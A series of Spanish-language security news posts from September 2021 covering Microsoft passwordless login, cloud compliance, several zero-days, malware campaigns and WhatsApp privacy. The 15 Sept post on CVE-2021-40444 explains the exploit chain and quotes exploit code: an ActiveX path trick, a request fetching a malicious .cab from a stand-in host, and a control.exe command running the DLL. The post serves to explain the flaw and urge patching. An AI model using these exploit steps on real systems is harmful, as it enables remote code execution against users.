17 sep. 2021

Microsoft lanzó el inicio de sesión sin contraseña

Esta modalidad le permite a los clientes iniciar sesión en cuentas de Microsoft sin utilizar una contraseña. El gigante tecnológico, como muchos otros en la industria, ha librado una guerra contra la autenticación tradicional basada en contraseñas.

Esto se debe a que las contraseñas son un objetivo principal para los ciberdelincuentes, ya que las contraseñas débiles o reutilizadas se pueden "adivinar" o forzar mediante ataques automatizados, conocidos como ataques de diccionario.

Microsoft permitió por primera vez a los clientes comerciales implementar la autenticación sin contraseña en sus entornos en marzo después de un año revolucionario en 2020 cuando informó que más de 150 millones de usuarios estaban iniciando sesión en sus cuentas de Azure Active Directory y Microsoft sin usar una contraseña.

Implementación en todas las cuentas de Microsoft

En el día de ayer, Microsoft anunció que los usuarios ya no necesitan tener una contraseña en sus cuentas para poder iniciar sesión.

En su lugar, pueden elegir entre la aplicación Microsoft Authenticator, Windows Hello, una clave de seguridad o códigos de verificación de teléfono / correo electrónico para iniciar sesión en las aplicaciones y servicios de Microsoft Edge o Microsoft 365.

"Ahora puede eliminar la contraseña de su cuenta de Microsoft e iniciar sesión utilizando métodos sin contraseña como Windows Hello, la aplicación móvil Microsoft Authenticator o un código de verificación enviado a su teléfono o correo electrónico", Liat Ben-Zur, vicepresidente corporativo de Microsoft.

"Esta función le ayudará a proteger su cuenta de Microsoft de ataques de identidad como el phishing y, al mismo tiempo, le proporcionará un acceso aún más fácil a las mejores aplicaciones y servicios como Microsoft 365, Microsoft Teams, Outlook, OneDrive, Microsoft Edge, y más".

¿Cómo dejar de usar contraseña ahora mismo?

Para comenzar a iniciar sesión en una cuenta de Microsoft sin una contraseña, primero se debe instalar la aplicación Microsoft Authenticator y vincularla a su cuenta personal de Microsoft.

A continuación, debe ir a la página de su cuenta de Microsoft, iniciar sesión y activar la "Cuenta sin contraseña" en Opciones de seguridad avanzadas opciones de seguridad adicionales.

Finalmente, siguiendo las instrucciones en pantalla, el proceso finalizará cuando se apruebe la notificación de su aplicación Authenticator. Una vez que la haya aprobado, ¡estará libre de su contraseña!.

Fuentes: Microsoft | TechCrunch | BleepingComputer

16 sep. 2021

Alinear CSA CCMv4 y SOC 2

Con la evolución de CSA CCMv4, la adopción generalizada de SOC 2, el alineamiento de estas dos normas y buenas prácticasa representa una opción sólida para que los proveedores de nube y sus clientes la consideren.

CCM v4, lanzado a principios de este año, es una mejora significativa con respecto a las versiones anteriores. Es más detallado (con 197 especificaciones de control en comparación con 133 en v3.01) y los requisitos son más nítidos. Hay detalles que se ha agregado en áreas clave, tales como:

  • Criptografía, cifrado y gestión de claves
  • Gestión del ciclo de vida de la privacidad y la seguridad de los datos
  • Gestión de incidentes de seguridad, descubrimiento electrónico y análisis forense en la nube
  • Gestión, transparencia y rendición de cuentas de la cadena de suministro
  • Gestión de amenazas y vulnerabilidades
  • Gestión universal de terminales

El Cuestionario de la Iniciativa de Evaluaciones de Consenso (CAIQ), ampliamente utilizado, también se está actualizando actualmente para reflejar CCM v4.

Para los proveedores de nube que ya han establecido marcos de control comunes, alineados con varios estándares y completado una variedad de auditorías y certificaciones SOC 2, ISO, FedRAMP y otras específicas de cada país, agregar SOC 2 + CCM a su programa puede no ser un factor crítico. Además, después de evaluarse a sí mismos con respecto a la versión 4, es posible que la empresa esté bien posicionada para hacerlo de una manera razonablemente eficiente.

SOC 2 se ha convertido en una necesidad para los proveedores de nube que prestan servicios a clientes empresariales. Al trabajar con algunos de los proveedores de nube más grandes del mundo, los informes completos de SOC 2 realmente representa a las mejores prácticas, mostrando de manera efectiva la estrategia del proveedor para satisfacer la evolución de la seguridad y las necesidades de cumplimiento.

La combinación de informes SOC 2 con la matriz de controles en la nube reconocida por la industria representa una buena opción que los proveedores pueden usar para demostrar la efectividad de sus controles, así como para generar una confianza fundamental con sus clientes. Para los proveedores de nube que están desarrollando sus programas de confianza, CCM v4 es un buen punto de referencia y SOC 2 + CCM puede ser una herramienta útil para resaltar las fortalezas de los programas de seguridad.

CSA ha ganando un amplio reconocimiento de la industria en la promoción de la seguridad en la nube. En particular:

  • CSA ha seguido perfeccionando la Matriz de controles en la nube (CCM) y alineándola con otros marcos.
  • Muchas organizaciones utilizan el CAIQ, que se basa en CCM.
  • Muchos proveedores de nube han realizado autoevaluaciones basadas en CCM y algunos han incorporado CCM en sus regímenes de auditoría.
  • CSA mantiene su programa Certificate of Cloud Security Knowledge (CCSK) y recientemente lanzó un nuevo Certificate of Cloud Auditing Knowledge (CCAK) junto con ISACA.

Fuente: CloudSecurityPlus

15 sep. 2021

Microsoft publica el parche para el 0-day de MSHTML (CVE-2021-40444) - PARCHEA YA!

Microsoft publicó la actualización KB5005565 para vulnerabilidad Zero-Day CVE-2021-40444 crítica en el motor de renderizado MSHTML. Esta vulnerabilidad permite la ejecución de comandos en la máquina de la víctima cuando esta abre un documento especialmente diseñado y hace clic en "Habilitar contenido" para deshabilitar la función Vista protegida de Microsoft Office.

Funcionamiento del exploit:

  1. El documento contiene un objeto MHTML OLE que es un sitio web alojado en un endpoint controlado por un atacante.
  2. El sitio web ejecuta código JavaScript ofuscado que crea una instancia de los controles ActiveX: ActiveXObjectVAR['Script']['location'] = '.cpl:../../../AppData/Local/Temp/Low/championship.inf'
  3. El código del sitio web obtiene y abre un archivo .cab desde el endpoint controlado por el atacante: XMLHttpRopen['call'](XMLHttpR, 'GET', 'http://127.0.0.1/test.cab', ![]). Este archivo contiene una DLL maliciosa con extensión .inf.
  • El código del sitio web ejecuta el archivo .inf como un archivo del Panel de control (.cpl) utilizando la utilidad control.exe. Por ejemplo, el código del sitio web puede ejecutar el siguiente comando: control.exe .cpl: ../../../AppData/Local/Temp/championship.inf.
  • La utilidad control.exe se ejecuta como un proceso secundario del proceso que aloja la aplicación de Microsoft Office que abrió el documento de Office, como winword.exe.
  • El archivo DLL malicioso .inf se ejecuta en el contexto de rundll32.exe.
  • Hasta ahora las mitigaciones contra CVE-2021-40444 iban desde sugerir que se deshabilite ActiveX para la mayoría o todas las zonas de seguridad de Internet Explorer, así como deshabilitar el Shell Preview en el Explorador de Windows; esto se puede hacer a través de la Política de grupo o localmente a través de claves de registro.

    Además ya hay varias PoCs que permiten armar documentos maliciosos que explotan CVE-2021-40444, entre los que destacamos sin duda el repositorio de Lockebyte que contiene varios scripts y HTMLs que reproducen el exploit y facilitan la vida.

    Si se rehace la plantilla maliciosa para que no requiera un nuevo control ActiveX estas mitigaciones pueden eludirse. Por lo tanto se debe actualizarse a la brevedad.

    Fuente: HackPlayers

    14 sep. 2021

    Los nuevos ataques de Zloader deshabilitan Windows Defender para evitar la detección

    Una campaña en curso de Zloader utiliza una nueva cadena de infección para deshabilitar Microsoft Defender en las computadoras de las víctimas para evadir la detección.

    Según las estadísticas de Microsoft , Microsoft Defender Antivirus es la solución Anti-malware preinstalada en más de mil millones de sistemas que ejecutan Windows 10.

    Los atacantes también han modificado el vector de entrada de malware de correos electrónicos no deseados, o phishing, a anuncios de TeamViewer de Google publicados a través de Google Adwords, redirigiendo los objetivos a sitios falsos de descarga. A partir de ahí, son engañados para que descarguen instaladores MSI firmados y maliciosos diseñados para instalar el malware Zloader en sus computadoras.

    "La cadena de ataque analizada en esta investigación muestra cómo la complejidad del ataque ha crecido para alcanzar un mayor nivel de sigilo", declararon los investigadores de seguridad de SentinelLabs Antonio Pirozzi y Antonio Cocomazzi en un informe publicado el 13/09/2021 .

    "El dropper de la primera etapa se ha cambiado del clásico documento malicioso a un payloads firmado MSI. Utilizando archivos binarios con puerta trasera y una serie de LOLBAS para dañar las defensas y representar la ejecución de sus payloads."

    Ataques centrados en clientes bancarios Australianos y Alemanes

    Zloader (también conocido como Terdot y DELoader) es un troyano bancario detectado inicialmente en agosto de 2015 cuando se utilizó para atacar a varios clientes de objetivos financieros británicos.

    Este malware se basa casi en su totalidad en el código fuente del troyano Zeus v2 filtrado en línea hace más de una década.

    El troyano bancario se dirigió a bancos de todo el mundo, desde Australia y Brasil hasta América del Norte, en un intento de recopilar datos financieros a través de inyecciones web que utilizan ingeniería social para convencer a los clientes afectados de que entreguen los códigos de autenticación y credenciales.

    Más recientemente, también se ha utilizado para entregar ransomware como Ryuk y Egregor. Zloader también viene con capacidades de acceso remoto y de puerta trasera, y también se puede utilizar para descargar payloads en los dispositivos infectados.

    Según la investigación de SentinelLabs, esta última campaña se centra principalmente en dirigirse a clientes de instituciones bancarias alemanas y australianas.

    "Esta es la primera vez que observamos esta cadena de ataques en una campaña de ZLoader", concluyeron los investigadores de SentinelLabs.

    "Al momento de escribir este artículo, no tenemos evidencia de que la cadena de entrega haya sido implementada por un afiliado específico o si fue proporcionada por el operador principal".

    MalwareBytes, que rastrea esta campaña de publicidad maliciosa, que llamaron Malsmoke desde principios de 2020, vio a los actores de amenazas infectando a sus objetivos haciendo dropper del malware Smoke Loader utilizando el kit de exploits Fallout a través de sitios maliciosos con contenido para adultos.

    Han cambiado a sitios que imitan Discord, TeamViewer, Zoom y QuickBooks a partir de finales de agosto de 2021, y es probable que se dirijan a empresas en lugar de personas, según el investigador de seguridad nao_sec.

    Fuentes: SentinelLabs | Bleepingcomputer

    Vulnerabilidades Zero-Days en Apple utilizados para espionaje de NSO Group

    Apple ha lanzado iOS 14.8, iPadOS 14.8, watchOS 7.6.2, macOS Big Sur 11.6 y Safari 14.1.2 para corregir dos vulnerabilidades explotadas activamente y utilizadas para realizar espionaje:

    • CVE-2021-30858 (WebKit): un problema de use-after-free podría provocar la ejecución de código arbitrario al procesar contenido web creado con fines malintencionados. La falla se ha solucionado mejorando la gestión de la memoria.
    • CVE-2021-30860 (CoreGraphics): una vulnerabilidad de desbordamiento de enteros que podría provocar la ejecución de código arbitrario al procesar un documento PDF creado con fines malintencionados. El error se corrigió con una validación de entrada mejorada.

    Las actualizaciones llegan semanas después de que investigadores del Citizen Lab de la Universidad de Toronto revelaran detalles de un exploit de día cero llamado "FORCEDENTRY" (también conocido como "Megalodon") que fue creado por el proveedor de vigilancia israelí NSO Group y supuestamente utilizado por el gobierno de Bahrein para instalar el software espía Pegasus en los teléfonos de nueve activistas en el país desde febrero de este año. FORCEDENTRY ha estado en uso desde al menos febrero de 2021.

    Además de activarse simplemente enviando un mensaje malicioso al objetivo, FORCEDENTRY también se destaca por el hecho de que socava expresamente una nueva función de seguridad de software llamada BlastDoor que Apple incorporó a iOS 14 para evitar intrusiones a través de iMessage. 

    "Nuestro último descubrimiento de otro Zero-Day de Apple empleado como parte del arsenal de NSO Group ilustra aún más que empresas como NSO Group están facilitando el 'despotismo como servicio' para las agencias de seguridad gubernamentales que no rinden cuentas", dijeron los investigadores de Citizen Lab.

    "Las aplicaciones de chat ubicuas se han convertido en un objetivo importante para los actores de amenazas más sofisticados, incluidas las operaciones de espionaje de los estados nacionales y las empresas mercenarias de software espía que las atienden. Tal como están diseñadas actualmente, muchas aplicaciones de chat se han convertido en un objetivo fácil irresistible", agregaron.

    Citizen Lab dijo que encontró el malware nunca antes visto en el teléfono de un activista saudí anónimo, y que la cadena de exploits se activa cuando las víctimas reciben un mensaje de texto que contiene una imagen GIF maliciosa que, en realidad, son Adobe PSD (archivos de documentos de Photoshop ) y archivos PDF diseñados para bloquear el componente iMessage responsable de renderizar imágenes automáticamente e implementar la herramienta de vigilancia.

    CVE-2021-30858, por otro lado, es el último de una serie de fallas de día cero de WebKit que Apple ha rectificado solo este año. Con este conjunto de actualizaciones más recientes, la compañía ha parcheado un total de 15 vulnerabilidades de día cero desde principios de 2021.

    Se recomienda a los usuarios de Apple iPhone, iPad, Mac y Apple Watch que actualicen inmediatamente su software para mitigar cualquier amenaza potencial que surja de la explotación activa de las fallas.

    Fuente: THN

    Exploits activos para dos Zero-Days en Chrome (Actualiza!)

    Google ha lanzado Chrome 93.0.4577.82 para Windows, Mac y Linux para corregir once vulnerabilidades de seguridad, dos de las cuales son Zero-Days que tienen exploits y se están explotando activamente: CVE-2021-30632 y CVE-2021-30633.

    La actualización se está implementando actualmente en todo el mundo en el canal de escritorio estable, y Google afirma que estará disponible para todos en los próximos días.

    Las dos vulnerabilidades de día cero solucionadas hoy se revelaron a Google el 8 de septiembre de 2021 y ambas son errores de memoria.

    El CVE-2021-30632 es una escritura fuera de los límites en el motor de JavaScript V8, y el error CVE-2021-30633 es un error de uso después de la liberación en la API de base de datos indexada.

    Si bien estos errores a menudo conducen a fallas del navegador, los actores de amenazas a veces pueden explotarlos para realizar la ejecución remota de código, escapes de sandbox y otros comportamientos maliciosos.

    Si bien Google ha revelado que ambos errores se están explotado, no han compartido más información sobre los ataques. Con estas dos vulnerabilidades, Google ahora ha parcheado un total de diez vulnerabilidades de día cero en Chrome en 2021.

    Se recomienda actualizar a la brevedad.

    Fuente: ChromeReleases

    13 sep. 2021

    "Un millón de dólares a cambio de infectar las redes de tu propia empresa"

    Un grupo de ciberdelincuentes de Nigeria está buscando empleados que actúen desde dentro de las compañías a cambio de un millón de dólares en bitcoins, según un informe de Abnormal Security. Su intención es implementar el ransomware Black Kingdom en las redes de las empresas desde el interior de las mismas.

    Abnormal Security detectó y bloqueó el pasado 12 de agosto correos electrónicos dirigidos a sus empleados. En los mensajes, los cibercriminales pedían a los trabajadores que fuesen cómplices de una serie de amenazas internas.

    El objetivo de estos emails era infectar las redes de Abnormal Security con ransomware. Sin embargo, esta compañía no ha sido la única que los piratas informáticos tienen en el punto de mira.

    En el informe, Abnormal Security explica que "el remitente dice al empleado que si son capaces de desplegar ransomware en un ordenador de la empresa o en el servidor de Windows" se le ofrecerá un millón de dólares en bitcoin o el 40% del "presunto rescate" de 2,5 millones de dólares.

    Los ciberdelincuentes han dado a los trabajadores dos maneras de contactar con ellos: a través de un correo electrónico o de Telegram. Para ello, han facilitado una cuenta de Outlook y un nombre de usuario de la plataforma de mensajería instantánea.

    Dado que algunos empleados de la compañía recibieron correos electrónicos de los ciberdelincuentes, Abnormal Security aprovechó para investigar y conocer su táctica. "Construimos una personalidad ficticia y nos comunicamos con el actor en Telegram para ver si podíamos obtener una respuesta", comentan en su informe.

    Al poco tiempo de enviar el mensaje, el atacante respondió y permitió que Abnormal Security conociese "la mentalidad de este actor de amenazas". El atacante pidió al empleado ficticio que accediese al servidor Windows de la falsa empresa e introdujese el ransomware.

    El atacante mandó dos enlaces desde los que se podía descargar el archivo malicioso, tanto en WeTransfer como en Mega.nz. El documento recibía el nombre de "Walletconnect (1).exe" y, según confirmó Abnormal Security, se trataba de un ransomware.

    Fuente: Abnormal Security

    12 sep. 2021

    Zero-Day crítico en MSHTML e incrustados en documentos de Microsoft Office (CVE-2021-40444)

    Microsoft ha informado de una vulnerabilidad Zero-Day identificada como CVE-2021-40444, cuya explotación permite la ejecución remota de código malicioso en el sistema operativo de las víctimas. Y, lo que es peor, los ciberdelincuentes ya están utilizando la vulnerabilidad para atacar a los usuarios de Microsoft Office. Por lo tanto, Microsoft recomienda que los administradores de red Windows empleen una solución alternativa temporal hasta que la empresa pueda implementar un parche. Diferentes expertos lograron reproducir el ataque en la última versión de Office 2019/Office 365 en equipos con Windows 10 tratándose de un fallo lógico y realmente peligroso.

    En esta ocasión, la vulnerabilidad CVE-2021-40444 se ha catalogado como importante con una severidad de 8.8 sobre 10 afectando a Windows Server desde 2008 hasta 2019, y a los sistemas operativos Windows desde la versión 8 a la 10. Los usuarios más vulnerables a este tipo de ataques son los que operan con cuentas con derechos administrativos.

    La vulnerabilidad está en MSHTML, el motor de Internet Explorer y, aunque ya son pocos los que utilizan IE (incluso Microsoft recomienda encarecidamente cambiarse a su nuevo navegador, Edge), el viejo navegador sigue siendo parte de los sistemas operativos modernos y algunos otros programas utilizan este motor para gestionar el contenido web. En particular, las aplicaciones de Microsoft como Word y PowerPoint dependen de él.

    Cómo explotan los atacantes la CVE-2021-40444

    Los ataques aparecen como controles ActiveX maliciosos incrustados en documentos de Microsoft Office. Estos controles permiten la ejecución de código arbitrario; lo más probable es que los documentos lleguen como archivos adjuntos en mensajes de correo electrónico. Como con cualquier documento adjunto, los atacantes tienen que persuadir a las víctimas para que abran el archivo.

    En teoría, Microsoft Office gestiona los documentos recibidos por Internet en Vista protegida o mediante Protección de aplicaciones para Office (Application Guard for Office), que pueden evitar un ataque de la CVE-2021-40444. Sin embargo, los usuarios podrían hacer clic en el botón de Habilitar edición sin pensarlo y desarmar los mecanismos de seguridad de Microsoft.

    Notificación del modo de Vista protegida en Microsoft Word

    Cómo proteger a tu empresa contra la CVE-2021-40444

    Microsoft ha prometido investigar y, si fuera necesario, liberar un parche oficial. Dicho esto, no esperamos que este parche esté listo antes del 14 de septiembre, el próximo martes de Parches. En circunstancias normales, la empresa no anunciaría una vulnerabilidad antes de liberar la solución, pero dado que los ciberdelincuentes ya están explotando la CVE-2021-40444, Microsoft recomienda emplear un método alternativo de inmediato.

    Esta alternativa consiste en prohibir la instalación de nuevos controles ActiveX. Esto lo puedes hacer al añadir unas cuantas claves al registro del sistema. Microsoft proporciona información detallada sobre la vulnerabilidad, incluida una sección de alternativas (en la que también puedes aprender cómo deshabilitarla una vez que ya no la necesites). De acuerdo con Microsoft, esta alternativa no debería afectar el desempeño de los controles ActiveX que ya están instalados.

    Por ahora, para evitar la explotación de la vulnerabilidad, se recomienda deshabilitar la función del Panel de "Vista Previa" en el explorador de Windows.

    Deshabilitar la instalación de todos los controles ActiveX en Internet Explorer mitiga este ataque. Esto se puede lograr para todos los sitios configurando la Política de grupo utilizando su Editor de políticas de grupo local o actualizando el registro.

    A continuación, se incluye un resumen de algunos enlaces útiles:

    Actualización: ya existe el parche.

    Fuente: Kaspersky

    Así Facebook socava la privacidad de sus de usuarios de WhatsApp

    Facebook tiene bajo contrato a más de 1.000 empleados que "continuamente leen y moderan millones de mensajes, imágenes y videos privados" enviados a través de su servicio filial de WhatsApp, según un informe publicado este martes por el portal ProPublica.

    Cuando Zuckerberg dio a conocer una nueva "visión centrada en la privacidad" para Facebook en marzo de 2019, citó el servicio de mensajería global de la empresa, WhatsApp, como modelo. Reconociendo que "actualmente no tenemos una sólida reputación en la creación de servicios de protección de la privacidad, pero creo que el futuro de la comunicación cambiará cada vez más a servicios privados y cifrados en los que las personas puedan confiar en lo que se dicen entre sí. permanece seguro y sus mensajes y contenido no se quedarán para siempre. Este es el futuro que espero que ayudemos a lograr. Planeamos construir esto de la forma en que hemos desarrollado WhatsApp".

    Entretanto, WhatsApp continúa promocionando sus políticas de privacidad y enfatiza que los mensajes cursados entre usuarios no pueden ser descifrados por la empresa. El director ejecutivo de Facebook, Mark Zuckerberg, aseguró durante su testimonio ante el Senado de EE.UU. en 2018: "No vemos nada del contenido en WhatsApp". Sin embargo, de acuerdo con un nuevo informe basado en documentos internos y entrevistas con moderadores, resulta que no es así.

    "WhatsApp tiene más de 1.000 trabajadores contratados, que llenan pisos de edificios de oficinas en Austin, Texas, Dublín y Singapur. [...] Emiten juicios sobre cualquier cosa que aparezca en su pantalla, reclamos de todo, desde fraude o spam hasta pornografía infantil y posibles conspiraciones terroristas, generalmente en menos de un minuto", escribió ProPublica. Estos moderadores no son empleados directos de WhatsApp o Facebook, sino que son contratistas que trabajan por 16,50 dólares la hora y están obligados a guardar silencio sobre su labor, bajo acuerdos de no divulgación.

    En conjunto, los trabajadores analizan millones de piezas de contenido de WhatsApp cada semana. Cada revisor maneja más de 600 tickets al día, lo que les da menos de un minuto por ticket. WhatsApp se negó a revelar cuántos trabajadores contratados se emplean para la revisión de contenido, pero una lista parcial de personal revisada por ProPublica sugiere que, solo en Accenture, hay más de 1.000. Se espera que los moderadores de WhatsApp, como sus contrapartes de Facebook e Instagram, cumplan con las métricas de rendimiento en cuanto a velocidad y precisión, que son auditadas por Accenture.

    ¿Qué contenidos ven los moderadores?

    Según el portal, los contenidos a los que deben estar atentos esos contratistas son mensajes reportados por los usuarios o marcados por inteligencia artificial. Así, cuando un internauta presiona 'reportar', el mensaje en cuestión, así como los cuatro anteriores en el chat respectivo, se descifran y se envían a uno de esos moderadores para su revisión.

    Los mensajes seleccionados por la inteligencia artificial se examinan con base en datos no cifrados recopilados por WhatsApp, como "los nombres y las imágenes de perfil de los grupos de WhatsApp de los usuarios, sus números de teléfono, fotos de perfil, mensajes de estado, nivel de batería del teléfono, idioma y zona horaria, identificación única del teléfono móvil y dirección IP, intensidad de la señal inalámbrica y sistema operativo del teléfono, así como una lista de sus dispositivos electrónicos, cualquier cuenta de Facebook e Instagram relacionada, la última vez que usaron la aplicación y cualquier historial previo de violaciones".

    De otra parte, algunos de los mensajes revisados por los moderadores fueron marcados por error. WhatsApp cuenta con 2.000 millones de usuarios que hablan cientos de idiomas, y el personal a veces tiene que confiar en la herramienta de traducción de Facebook para analizar los mensajes marcados. Según un empleado, esa herramienta es "horrible" para decodificar la jerga local y el contenido político.

    La negación de WhatsApp de que modera el contenido es notablemente diferente de lo que dice Facebook Inc. sobre los hermanos corporativos de WhatsApp, Instagram y Facebook. La compañía ha dicho que unos 15.000 moderadores examinan el contenido de Facebook e Instagram, ninguno de los cuales está encriptado. Publica informes trimestrales de transparencia que detallan cuántas cuentas de Facebook e Instagram han "actuado" para varias categorías de contenido abusivo. No existe tal informe para WhatsApp.

    Los informes indican, además, que WhatsApp comparte ciertos datos privados con agencias de aplicación de la ley, como el Departamento de Justicia de EE.UU. A manera de ejemplo, ProPublica denuncia que datos de los usuarios de WhatsApp ayudaron a los fiscales a construir un caso contra una exempleada del Departamento del Tesoro, Natalie Edwards, que supuestamente filtró a BuzzFeed News informes bancarios confidenciales sobre transacciones sospechosas.

    La implementación de un ejército de revisores de contenido es solo una de las formas en que Facebook Inc. ha comprometido la privacidad de los usuarios de WhatsApp. Juntas, las acciones de la compañía han dejado a WhatsApp, la aplicación de mensajería más grande del mundo, con dos mil millones de usuarios, mucho menos privada de lo que sus usuarios probablemente entienden o esperan. Una investigación de ProPublica, basada en datos, documentos y docenas de entrevistas con empleados y contratistas actuales y anteriores, revela cómo, desde que compró WhatsApp en 2014, Facebook ha socavado silenciosamente sus amplias garantías de seguridad de múltiples maneras.

    Dos artículos recientes señalan la existencia de moderadores de WhatsApp, pero se centraron en sus condiciones de trabajo y pago en lugar de su efecto en la privacidad de los usuarios. Este artículo es el primero en revelar los detalles y el alcance de la capacidad de la empresa para analizar los mensajes y los datos de los usuarios. y examinar qué hace la empresa con esa información).

    Respuesta de WhatsApp

    El director de comunicaciones de WhatsApp, Carl Woog, reconoció que sus contratistas revisan los mensajes para identificar y eliminar a "los peores" abusadores, y aseveró que la compañía no considera que ese trabajo sea una moderación de contenidos. "En realidad, no solemos usar este término para WhatsApp", dijo Woog a ProPublica.

    "WhatsApp es un salvavidas para millones de personas en todo el mundo. Las decisiones que tomamos, sobre cómo creamos nuestra aplicación, se centran en la privacidad de nuestros usuarios, manteniendo un alto grado de confiabilidad y previniendo el abuso", aseguraron desde la empresa.

    Fuente: ProPublica

    11 sep. 2021

    Nuevas vulnerabilidades graves en paquetes de Node.js

    GitHub ha resuelto numerosas vulnerabilidades en los paquetes tar y @ npmcli/arborist de Node.js. Las mismas permiten sobrescribir archivos y ejecutar código arbitrario. El pasado miércoles, GitHub anunció a la compañía de fallas y errores de seguridad que afectan los mencionados paquetes.

    Estos reportes se efectuaron entre el 21 de julio y el 13 de agosto por Robert Chen y Philip Papurt, quienes, a través de los programas de recompensas, que otorgan a los investigadores crédito y recompensas financieras, por revelar de manera responsable las vulnerabilidades al vendedor.

    El director de seguridad de GitHub, Mike Hanley, confirmó que estos informes llevaron a GitHub a realizar su propia revisión de lo reportado, lo que llevó al descubrimiento de problemas de seguridad adicionales.

    El paquete tar se usa para imitar el sistema de archivo tar en Unix, mientras que @npmcli/arborist se ha desarrollado para administrar árboles node_modules. Tar es una dependencia central de npm para la extracción de paquetes npm, y @npmcli / arborist es una dependencia central de npm CLI.

    Node-tar ha representado 22.390.735 descargas semanales, al momento de escribir este artículo, mientras que @npmcli/arborist se ha descargado 405.551 veces durante la semana pasada. En total, se han verificado 7 (siete) vulnerabilidades a través de los informes de recompensas de errores y el equipo de seguridad en los hallazgos de GitHub:

    Vulnerabilidades @npmcli/arborist:

    "CVE-2021-32804CVE-2021-37713, CVE-2021-39134 y CVE-2021-39135 tienen un impacto específico en la seguridad de la CLI de npm cuando se procesa la instalación de un paquete de npm malicioso o que no es de confianza", dice GitHub. "Algunos de estos problemas pueden resultar en la ejecución de código arbitrario, incluso si está utilizando --ignore-scripts para evitar el procesamiento de los scripts del ciclo de vida del paquete".

    Para que los desarrolladores estén al tanto de estos errores, GitHub creó 16,7 millones de alertas de Dependabot y lanzó 1,8 millones de notificaciones.

    GitHub ha solicitado a los dueños de proyectos que usen la CLI de npm y la descarguen directamente para actualizar a v6.14.15, v7.21.0 o más reciente. Si Node.js está en uso, la organización recomienda una actualización a las últimas versiones de Node 12, 14 o 16, todas las cuales contienen parches para resolver las fallas de seguridad. Los usuarios de Tar ahora pueden actualizar a las versiones 4.4.19, 5.0.11 y 6.1.10. La última versión disponible de @ npmcli / arborist es 2.8.3.

    Chen y Papurt han recibido una recompensa combinada de U$S14.500 por sus informes.

    Fuentes: Github-Blog | Zdnet